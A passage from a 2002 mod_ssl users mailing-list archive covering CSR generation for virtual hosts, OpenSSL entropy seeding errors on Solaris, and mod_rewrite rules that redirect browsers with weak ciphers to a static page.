each host.  Something has me thinking that if I run the commans from the
mod_ssl faq, I'll get several CSRs for the same host (either local or
the main hostname).  That shouldn't be, certs are hostname specific
right?  Anyway, if anyone would be so kind as to pass me a clue.

Thanks.
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 21:23:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA10326; Mon, 1 Jul 2002 21:22:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id VAA10254; Mon, 1 Jul 2002 21:21:26 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g61JIAfu000588
	for ; Mon, 1 Jul 2002 15:18:10 -0400
Date: Mon, 1 Jul 2002 15:18:10 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Quickie on Certrificate Requests (combined with virtual hosts)...
In-Reply-To: <1025551006.16029.331.camel@salderman.lerc.nasa.gov>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On 1 Jul 2002, Sean M Alderman wrote:

>   I'm hoping someone on the list might have some experience with
> multiple IP based virtual hosts and generating CSRs for ssl certs for
> each host.  Something has me thinking that if I run the commans from the
> mod_ssl faq, I'll get several CSRs for the same host (either local or
> the main hostname).  That shouldn't be, certs are hostname specific
> right?  Anyway, if anyone would be so kind as to pass me a clue.

The commands in the FAQ should be okay.  When you run openssl and ask it
to generate a CSR, it will prompt you for various things, one of which is
"Common Name (CN)" -- enter the hostname with which the certificate should
be associated there, and that's all you should have to do.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 22:08:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA14893; Mon, 1 Jul 2002 22:07:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id WAA14741; Mon, 1 Jul 2002 22:05:51 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 87854C6938
	for ; Mon,  1 Jul 2002 16:05:44 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g61K5hra010397
	for ; Mon, 1 Jul 2002 16:05:44 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id QAA10230; Mon, 1 Jul 2002 16:05:43 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Quickie on Certrificate Requests (combined with virtual
	hosts)...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
	
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.7 
Date: 01 Jul 2002 16:05:43 -0400
Message-Id: <1025553943.29491.375.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cool, thanks!... So I've done that, I needed to use the make certificate
instead of the openssh commands because of the lack of a /dev/random on
Solaris 8 (I don't know why make is able to do make it happen when I
can't).  Anyway, each time I run it it generates a new server.key file,
I need to keep each of these right?...perhaps name them based on the
virtual host each are for?

On Mon, 2002-07-01 at 15:18, Cliff Woolley wrote:
> On 1 Jul 2002, Sean M Alderman wrote:
> 
> >   I'm hoping someone on the list might have some experience with
> > multiple IP based virtual hosts and generating CSRs for ssl certs for
> > each host.  Something has me thinking that if I run the commans from the
> > mod_ssl faq, I'll get several CSRs for the same host (either local or
> > the main hostname).  That shouldn't be, certs are hostname specific
> > right?  Anyway, if anyone would be so kind as to pass me a clue.
> 
> The commands in the FAQ should be okay.  When you run openssl and ask it
> to generate a CSR, it will prompt you for various things, one of which is
> "Common Name (CN)" -- enter the hostname with which the certificate should
> be associated there, and that's all you should have to do.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 22:26:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA16982; Mon, 1 Jul 2002 22:25:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id WAA16920; Mon, 1 Jul 2002 22:24:59 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Mon, 1 Jul 2002 13:25:20 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Mon, 01 Jul 2002 13:24:42 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Mon, 01 Jul 2002 13:24:28 -0700
From: "Jeff Landers" 
To: 
Subject: Re: Quickie on Certrificate Requests (combined with
	virtualhosts)...
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id WAA16938
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you wish to fix Solaris 8 to use /dev/random  use the following Sun patch available thru Sunsolve

dev random patch number 112438-01

>>> sean.m.alderman@grc.nasa.gov 07/01/02 01:05PM >>>
Cool, thanks!... So I've done that, I needed to use the make certificate
instead of the openssh commands because of the lack of a /dev/random on
Solaris 8 (I don't know why make is able to do make it happen when I
can't).  Anyway, each time I run it it generates a new server.key file,
I need to keep each of these right?...perhaps name them based on the
virtual host each are for?

On Mon, 2002-07-01 at 15:18, Cliff Woolley wrote:
> On 1 Jul 2002, Sean M Alderman wrote:
> 
> >   I'm hoping someone on the list might have some experience with
> > multiple IP based virtual hosts and generating CSRs for ssl certs for
> > each host.  Something has me thinking that if I run the commans from the
> > mod_ssl faq, I'll get several CSRs for the same host (either local or
> > the main hostname).  That shouldn't be, certs are hostname specific
> > right?  Anyway, if anyone would be so kind as to pass me a clue.
> 
> The commands in the FAQ should be okay.  When you run openssl and ask it
> to generate a CSR, it will prompt you for various things, one of which is
> "Common Name (CN)" -- enter the hostname with which the certificate should
> be associated there, and that's all you should have to do.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
> User Support Mailing List                      modssl-users@modssl.org 
> Automated List Manager                            majordomo@modssl.org 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 22:32:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA17734; Mon, 1 Jul 2002 22:31:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from library.med.nyu.edu id WAA17705; Mon, 1 Jul 2002 22:31:07 +0200 (MET DST)
Received: (from root@localhost)
	by library.med.nyu.edu (8.9.1b+Sun/8.9.1) id QAA01205
	for modssl-users@modssl.org; Mon, 1 Jul 2002 16:29:38 -0400 (EDT)
Received: from [128.122.205.13] (mclib13.med.nyu.edu [128.122.205.13])
	by library.med.nyu.edu (8.9.1b+Sun/8.9.1) with ESMTP id QAA01197
	for ; Mon, 1 Jul 2002 16:29:32 -0400 (EDT)
Mime-Version: 1.0
X-Sender: barrem01@library.med.nyu.edu
Message-Id: 
Date: Mon, 1 Jul 2002 16:30:55 -0400
To: modssl-users@modssl.org
From: Mike Barrett 
Subject: PRNG Seed
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Barrett 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


-- 
I've been reading FAQ's and mail archives for days, but I don't seem 
to be making any progress.  Please help.

I keep getting the following error:

[Mon Jul 01 15:52:33 2002] [info] Init: Initializing OpenSSL library
[Mon Jul 01 15:52:33 2002] [info] Init: Seeding PRNG with 0 bytes of entropy
[Mon Jul 01 15:52:33 2002] [warn] Init: PRNG still contains not 
sufficient entro
py!
[Mon Jul 01 15:52:33 2002] [info] Init: Generating temporary RSA 
private keys (5
12/1024 bits)
[Mon Jul 01 15:52:33 2002] [error] Init: Failed to generate temporary 
512 bit RS
A private key
Configuration Failed


I have tried the following options for SSLRandomSeed with the same results:
#SSLRandomSeed startup builtin
#SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/usr/local/apache2/conf/rand.dat
#SSLRandomSeed connect file:/usr/local/apache2/conf/rand.dat
#SSLRandomSeed startup file:/dev/egd-pool 512
#SSLRandomSeed connect file:/dev/egd-pool 512
#SSLRandomSeed startup egd:/dev/egd-pool
#SSLRandomSeed connect egd:/dev/egd-pool
#SSLRandomSeed startup exec:/usr/local/ssl/bin/openssl rand 512
#SSLRandomSeed connect exec:/usr/local/ssl/bin/openssl rand 512
SSLRandomSeed startup exec:"/usr/local/ssl/bin/openssl rand 512"
SSLRandomSeed connect exec:"/usr/local/ssl/bin/openssl rand 512"


/usr/local/apache2/conf/rand.dat was created using
/usr/local/ssl/bin/openssl rand -out /usr/local/apache2/conf/rand.dat 
512 (openssl-0.9.6d) and seems to be full of very random data.

The socket at /dev/egd-pool was created using
/usr/local/sbin/prngd /dev/egd-pool

It seems to me, with my limited experience, that many of these 
methods should have worked to seed the random number generator with a 
few bits of entropy.  Is there any other directive that could affect 
the error I'm getting?

I'd also appreciate it if someone could explain to me why openssl can 
dump out reams of randomness when called from the command line, but 
doesn't have enough entropy to create a temporary key when my apache 
2.0.39 comes to call.

Thanks,

  - Mike
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  1 22:35:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18063; Mon, 1 Jul 2002 22:34:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id WAA17951; Mon, 1 Jul 2002 22:33:42 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g61KU9B8000750
	for ; Mon, 1 Jul 2002 16:30:09 -0400
Date: Mon, 1 Jul 2002 16:30:09 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Quickie on Certrificate Requests (combined with virtual hosts)...
In-Reply-To: <1025553943.29491.375.camel@salderman.lerc.nasa.gov>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On 1 Jul 2002, Sean M Alderman wrote:

> Cool, thanks!... So I've done that, I needed to use the make certificate
> instead of the openssh commands because of the lack of a /dev/random on
> Solaris 8 (I don't know why make is able to do make it happen when I
> can't).  Anyway, each time I run it it generates a new server.key file,
> I need to keep each of these right?...perhaps name them based on the
> virtual host each are for?

Yes, exactly right.

Dunno why the make certificate thing works when the openssl commands
directly don't -- probably just some configuration issues.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  2 11:03:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13981; Tue, 2 Jul 2002 11:02:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA13897; Tue, 2 Jul 2002 11:01:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B5B924CE683; Tue,  2 Jul 2002 11:01:34 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5E2A82870E; Tue,  2 Jul 2002 10:58:40 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx1.ergon.ch id JAA03561; Tue, 2 Jul 2002 09:31:29 +0200 (MET DST)
Received: from mahler.ergon.ch (mahler.ergon.ch [193.72.196.199])
	by mx1.ergon.ch (Postfix) with ESMTP id 2235F60805
	for ; Tue,  2 Jul 2002 09:31:29 +0200 (MET DST)
Received: from orbison.ergon.ch (orbison [193.72.196.63])
	by mahler.ergon.ch (Postfix) with ESMTP id C491390192
	for ; Tue,  2 Jul 2002 09:31:28 +0200 (MET DST)
Received: from localhost (mbutikof@localhost)
	by orbison.ergon.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA19078
	for ; Tue, 2 Jul 2002 09:31:28 +0200 (MEST)
X-Authentication-Warning: orbison.ergon.ch: mbutikof owned process doing -bs
Date: Tue, 2 Jul 2002 09:31:28 +0200 (MEST)
From: Marc Buetikofer 
To: modssl-users@modssl.org
Subject: Static Page after SSL Handshake Failure ??
In-Reply-To: <1025299272.706.21.camel@theblues>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marc Buetikofer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users




Hi,

Is it possible for to return a static page to a browser if an SSL
handshake failed? I have in mind the situation, when e.g. a 56-bit Browser
tries to hanshake with an Apache that requires 128 bits.
I could not find any directive in the documentation.

Thanks for help!!

 Marc

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  2 11:17:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA15841; Tue, 2 Jul 2002 11:16:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA15739; Tue, 2 Jul 2002 11:15:06 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g629Ekr16910
	for ; Tue, 2 Jul 2002 10:14:51 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 2 Jul 2002 10:14:42 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020672B1@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Static Page after SSL Handshake Failure ??
Date: Tue, 2 Jul 2002 10:14:35 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't think you can. The handshake has to complete before any other data
can be transferred. An incomplete handshake means no connection and hence no
data.

However, I think you might be able to connect users with a lower cipher to a
different document root and from there direct them elsewhere. I recall this
being raised before, so look in the archive of this list.

Users of IIS will notice that the errors returned from server are becoming
more and more meaningless. "The page cannot be displayed" covers up whatever
the real error is.

I recommend using curl for testing anyway: http://curl.haxx.se

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: Marc Buetikofer [mailto:mbutikof@ergon.ch]
> Sent: 02 July 2002 08:31
> To: modssl-users@modssl.org
> Subject: Static Page after SSL Handshake Failure ??
> 
> 
> 
> 
> 
> Hi,
> 
> Is it possible for to return a static page to a browser if an SSL
> handshake failed? I have in mind the situation, when e.g. a 
> 56-bit Browser
> tries to hanshake with an Apache that requires 128 bits.
> I could not find any directive in the documentation.
> 
> Thanks for help!!
> 
>  Marc
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  2 15:08:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA23137; Tue, 2 Jul 2002 15:03:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id PAA22939; Tue, 2 Jul 2002 15:02:08 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 2031664108
	for ; Tue,  2 Jul 2002 09:01:57 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g62D1tra020624
	for ; Tue, 2 Jul 2002 09:01:56 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id JAA28686; Tue, 2 Jul 2002 09:01:55 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Quickie on Certrificate Requests (combined with virtual
	hosts)...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
	
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.7 
Date: 02 Jul 2002 09:01:55 -0400
Message-Id: <1025614915.29491.386.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks guys.  I saw the Sun patch, but unfortunately I'm just the
webmaster on this machine, not the Admin, so there's not a lot I can do
about that except ask him to put it on.  Anyway, I just shipped off my
CSRs.  Thanks for the Help!

On Mon, 2002-07-01 at 16:30, Cliff Woolley wrote:
> On 1 Jul 2002, Sean M Alderman wrote:
> 
> > Cool, thanks!... So I've done that, I needed to use the make certificate
> > instead of the openssh commands because of the lack of a /dev/random on
> > Solaris 8 (I don't know why make is able to do make it happen when I
> > can't).  Anyway, each time I run it it generates a new server.key file,
> > I need to keep each of these right?...perhaps name them based on the
> > virtual host each are for?
> 
> Yes, exactly right.
> 
> Dunno why the make certificate thing works when the openssl commands
> directly don't -- probably just some configuration issues.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  2 15:36:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28510; Tue, 2 Jul 2002 15:35:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA28424; Tue, 2 Jul 2002 15:34:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 572884CE74E; Tue,  2 Jul 2002 15:11:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 56ACC2873E; Tue,  2 Jul 2002 15:11:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id MAA26287; Tue, 2 Jul 2002 12:44:31 +0200 (MET DST)
Date: Tue, 2 Jul 2002 12:44:31 +0200 (MET DST)
Message-Id: <200207021044.MAA26287@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] POST re-negotiation with Apache2 (PR#727)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: kuba lipinski
Version: 2.8.10-1.3.26
OS: Windows
Submission from: (NULL) (213.17.133.2)


hello,

when will POST re-negotiation be implemented for Apache2? it is very important
feature.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  2 15:36:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28514; Tue, 2 Jul 2002 15:35:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA28421; Tue, 2 Jul 2002 15:34:56 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 437654CE748; Tue,  2 Jul 2002 15:11:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 64C522870E; Tue,  2 Jul 2002 15:10:57 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id MAA24906; Tue, 2 Jul 2002 12:36:03 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g62Aa0v14559655
	for modssl-users@modssl.org; Tue, 2 Jul 2002 12:36:00 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0nDyO; Tue Jul  2 12:35:55 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id MAA24164
	for ; Tue, 2 Jul 2002 12:34:45 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id MAA06933
	for modssl-users@modssl.org; Tue, 2 Jul 2002 12:35:46 +0200 (METDST)
Date: Tue, 2 Jul 2002 12:35:46 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: Static Page after SSL Handshake Failure ??
Message-ID: <20020702123546.A2025315@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <9B66BBD37D5DD411B8CE00508B69700F020672B1@pborolocal.rnib.org.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F020672B1@pborolocal.rnib.org.uk>; from John.Airey@rnib.org.uk on Tue, Jul 02, 2002 at 10:14:35AM +0100
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Tue, Jul 02, 2002 at 10:14:35AM +0100, John.Airey@rnib.org.uk wrote:
> However, I think you might be able to connect users with a lower
> cipher to a different document root and from there direct them
> elsewhere. I recall this being raised before, so look in the
> archive of this list.

I've done this using mod_rewrite. For example, to redirect
browsers connecting with only export cipher strengths:


SSLOptions +StdEnvVars
RewriteEngine on
RewriteCond %{ENV:SSL_CIPHER_EXPORT} "^true$"
RewriteRule ".*" /noexport.html [L]


Or to redirect browsers not connecting with at least 100 bit
effective key size:


SSLOptions +StdEnvVars
RewriteEngine on
RewriteCond %{ENV:SSL_CIPHER_USEKEYSIZE} "!^[0-9]{3}"
RewriteRule ".*" /keytoosmall.html [L]


Note that the URIs you redirect to (here: /noexport.html and
/keytoosmall.html) have to live outside /path/to/special/directory
(or inside a subdirectory which has RewriteEngine off).

Of course, having StdEnvVars set for certain directories lowers
the performance, but I see no other way to check for cipher
parameters without letting the handshake fail.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  3 08:16:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA00006; Wed, 3 Jul 2002 08:15:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA29882; Wed, 3 Jul 2002 08:14:14 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 86B474CE638; Wed,  3 Jul 2002 08:14:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DDA2D286E3; Wed,  3 Jul 2002 07:10:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rigel.cyberpass.net id GAA17299; Wed, 3 Jul 2002 06:04:07 +0200 (MET DST)
Received: from localhost (peleus@localhost)
	by rigel.cyberpass.net (8.11.3/8.11.3) with ESMTP id g631O8Y29544
	for ; Tue, 2 Jul 2002 18:24:09 -0700
Date: Tue, 2 Jul 2002 18:24:08 -0700 (PDT)
From: peleus 
X-Sender: peleus@rigel.cyberpass.net
To: modssl-users@modssl.org
Subject: Macs & SSL
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: peleus 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


	Ok.  I already know about adding the "nokeepalive
ssl-unclean-shutdown" tag to get mod-ssl and the ever buggy Mac IE to
talk.  Does anyone know if Mac's IE has trouble loading SSL pages if it
requires two different cerificates?  For instance, let's say I am loading
a page vixxa SSL from https://www.a.com.  If within that page there are
image references to https://www.b.com, will this also create the "Data
Encryption Error"?  Both a.com and b.com have the "nokeepalive" section in
their httpd.confs for SSL but have seperate Thawte certificates.

thanks,
  -Peleus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
